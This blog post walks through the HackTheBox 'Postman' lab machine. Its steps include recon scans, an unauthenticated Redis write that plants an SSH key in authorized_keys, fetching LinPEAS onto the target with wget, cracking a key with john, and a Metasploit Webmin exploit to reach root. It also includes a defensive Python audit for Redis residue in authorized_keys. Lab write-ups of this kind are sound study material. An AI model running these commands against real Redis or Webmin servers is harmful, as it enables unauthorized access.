Ajdin's blog

HackTheBox Postman Write Up

13 Mar 2020

Reconnaissance

Let’s run a quick nmap scan as always.

# nmap -sV -sC -O -oA nmap/initial 10.10.10.160

Short explanation:

-sV Version detection
-sC Script scan
-O  Enable OS detection 
-oA Output to all formats


While I wait for this to be finished I’ll start a full nmap scan.

# nmap -sV -sC -O -p- -oA nmap/initial 10.10.10.160

[screenshot: nmap initial scan]

As usual, ports 22 and 80 are open, but here there is also an HTTP service on port 10000. Let's enumerate those pages.

[screenshot: port 80]

The second web server (port 10000) only answers over https, so I have to change the scheme of my request from http to https to reach it.

[screenshot: port 10000]

I'll also start up gobuster. On port 10000 every page link loads the same login form, so gobuster doesn't help us there. Let's run it against port 80.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.160 -x php,html -t 100

[screenshot: gobuster output]

At this point I felt somewhat lost, so I looked at what the full nmap scan had found.

[screenshot: nmap full scan]

Getting user account

Redis file write

So Redis is running here. I looked for an explanation of what it is and how it can be exploited, and Google turned up this:

The Redis security model is: “it’s totally insecure to let untrusted clients access the system, please protect it from the outside world yourself”.

So we're on the right track: the developers themselves point us to the next steps. Using telnet we can see that we can connect to the service easily:

$ telnet 10.10.10.160 6379

We don't have a real shell here, but we can write files. We'll write our own ssh key into the redis user's authorized_keys. Let's generate a key pair.

[screenshot: generating the ssh key pair]

We will push the key, padded with newlines before and after. Why? We'll store it in Redis memory and then make Redis save its database to a file. That dump will contain binary garbage around our key, and we're relying on sshd to parse the file, skip the lines it can't interpret and still read our key correctly.

$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

Now foo.txt is just our public key padded with newlines. We can write this string into Redis memory using redis-cli:

$ redis-cli -h 10.10.10.160 flushall
$ cat foo.txt | redis-cli -h 10.10.10.160 -x set crackit

Looks good. How do we dump the memory contents into the authorized_keys file? You can see what I did in the picture below.

[screenshot: redis-cli commands used to save the dump as authorized_keys]
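A defender-side check I would pair with this step (added here; it is not from the original write-up): a Python script that audits an authorized_keys file for what a Redis dump leaves behind, i.e. lines that are not well-formed public keys and the RDB magic string. The sample file, the keys and the helper names are constructed for this example.

```python
import base64
import re
import struct

# An RDB dump starts with the magic "REDIS" plus a 4-digit format version;
# finding it inside authorized_keys is a strong sign the file came from a Redis SAVE.
RDB_MAGIC = re.compile(rb"REDIS\d{4}")
KEY_TYPES = {"ssh-rsa", "ssh-dss", "ssh-ed25519", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}


def parse_key_line(line: str):
    """Return (key_type, comment) for a well-formed authorized_keys entry, else None.
    Blank lines, '#' comments and unparseable lines yield None, mirroring how sshd
    skips them. A leading options field without embedded spaces is tolerated."""
    fields = line.strip().split()
    if not fields or fields[0].startswith("#"):
        return None
    if fields[0] not in KEY_TYPES and len(fields) > 1:
        fields = fields[1:]          # drop options such as no-pty
    if len(fields) < 2 or fields[0] not in KEY_TYPES:
        return None
    try:
        blob = base64.b64decode(fields[1], validate=True)
    except ValueError:               # binascii.Error is a ValueError
        return None
    if len(blob) < 4:
        return None
    # the wire-format blob begins with a length-prefixed copy of the key type
    n = struct.unpack(">I", blob[:4])[0]
    if blob[4:4 + n] != fields[0].encode():
        return None
    return fields[0], " ".join(fields[2:])


def audit_authorized_keys(data: bytes) -> dict:
    """Summarise a file: parsed keys, lines sshd would ignore, and RDB magic presence."""
    keys, junk = [], 0
    for raw in data.split(b"\n"):
        text = raw.decode("utf-8", errors="replace")
        if not text.strip():
            continue
        parsed = parse_key_line(text)
        if parsed:
            keys.append(parsed)
        else:
            junk += 1
    return {"rdb_magic": bool(RDB_MAGIC.search(data)), "keys": keys, "junk_lines": junk}


def ed25519_line(fill: int, comment: str) -> bytes:
    """Constructed key: structurally valid ssh-ed25519 blob with a dummy 32-byte point."""
    blob = b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20" + bytes([fill]) * 32
    return b"ssh-ed25519 " + base64.b64encode(blob) + b" " + comment.encode()


def sample_file() -> bytes:
    """Constructed sample: a legitimate key, then the residue of a Redis dump that
    carried a newline-padded key, as described in the write-up."""
    rdb_residue = b"REDIS0009\xfe\x00\xfb\x01\x00\x00\x07crackit\x00"
    return (ed25519_line(0x11, "matt@workstation") + b"\n" + rdb_residue + b"\n\n"
            + ed25519_line(0x22, "planted") + b"\n\n" + b"\xff\x00\x00trailer")
```

Run it over every user's authorized_keys (and the redis user's home in particular): any RDB magic or unparseable binary lines next to an unexpected key is worth an incident ticket.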

Now that we've got a shell, we can see by running

$ cat /etc/passwd

that the next step is to gain access to Matt's account.

We can't run anything with sudo and we don't belong to any special groups. I searched the redis directory, but there was nothing we could work with; I went into /var and checked every folder, and again nothing. Let's pull out the big guns, the big guns being LinPEAS. Let's transfer it onto the server.

Clone the repo to your machine, enter the linPEAS directory and start an http server from there. I used port 1114.

$ sudo python -m SimpleHTTPServer 1114

On the target, go to /tmp, create a directory there and cd into it (e.g. /tmp/1234), then fetch the script from your machine.

$ wget <your ip here>:1114/linpeas.sh

I ran the script and spent some time going through the output. It took a while, but there is an id_rsa.bak file.

[screenshot: LinPEAS output showing id_rsa.bak]

Cracking ssh key with John

Run the key through ssh2john.py and crack the resulting hash with john and the rockyou.txt wordlist.

[screenshot: john output]

I tried to ssh into the server with this key, without success. So I connected again as redis and ran

$ su Matt

And that's how I got user:

Matt@Postman:~$ cat user.txt 
517ad...

Getting root

Getting root is pretty easy: I just logged into Webmin as Matt with the password computer2008. In there I couldn't do anything, but there is a notification that the software needs to be updated.

Webmin privilege escalation

I found an exploit for it in Metasploit and used it. The options I changed are highlighted below. Make sure to switch the payload, as the default one didn't work; I always have success with the python one.

 > show payloads
 > set payload <payload here>

[screenshot: Metasploit module options]

After this, simply type exploit; you should get a shell as root and can cat root.txt.

Tags: redis, john, webmin